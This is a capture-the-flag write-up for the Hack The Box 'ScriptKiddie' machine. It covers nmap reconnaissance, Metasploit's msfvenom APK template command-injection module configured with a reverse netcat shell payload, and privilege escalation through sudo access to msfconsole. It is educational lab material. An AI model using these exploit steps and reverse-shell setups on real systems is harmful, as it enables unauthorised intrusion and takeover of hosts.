ScriptKiddie Writeup

Reconnaissance & Enumeration

As usual, I started by enumerating the machine.

# Nmap 7.91 scan initiated Sun Mar  7 12:11:35 2021 as: nmap -v -sC -sV -oN nmap -p- scriptkiddie.htb
Nmap scan report for scriptkiddie.htb (10.10.10.226)
Host is up (0.070s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_  Supported Methods: POST GET OPTIONS HEAD
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar  7 12:12:17 2021 -- 1 IP address (1 host up) scanned in 41.65 seconds

Nmap has found a webserver on port 5000 and the SSH on port 22. Let us visit the website. Looking at the page the host exploits some interesting programs to the user.

The first thing I have tried is command injection, but it did not quite work.

Getting user

After giving up on trying command injection, I started to search for exploits on the tools provided by the server. Using searchsploit I have found an exploit related to msfvenom, which was a kind of new exploit at the time of the release of the box, so having the newest version of searchploit and msf was necessary.

┌──(kali㉿kali)-[~/Desktop/ScriptKiddie]
└─$ searchsploit msfvenom
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
Metasploit Framework 6.0.11 - msfvenom APK template command injection           | multiple/local/49491.py
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Metasploit has a module for the exploit. Let us use it.

After setting the options and running the module we get an .apk file, which will be used as a template by msfvenom of the target machine.

msf6 > search msfvenom

Matching Modules
================

   #  Name                                                                    Disclosure Date  Rank       Check  Description
   -  ----                                                                    ---------------  ----       -----  -----------
   0  exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection  2020-10-29       excellent  No     Rapid7 Metasploit Framework msfvenom APK Template Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
LPORT => 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

[+] msf.apk stored at /root/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) >

Now let us upload this apk and start a listener on the port we have set in the msfconsole.

After clicking generate we should get a reverse shell to the user kid. In the home folder of the user, we can grab the user flag.

Getting root

After doing some basic Linux privilege escalation enumeration I found out that the user “pwn” can run msfconsole as sudo. Using msfconsole we can easily read files, spawn bash and so on, so at this point we can easily grab the root flag.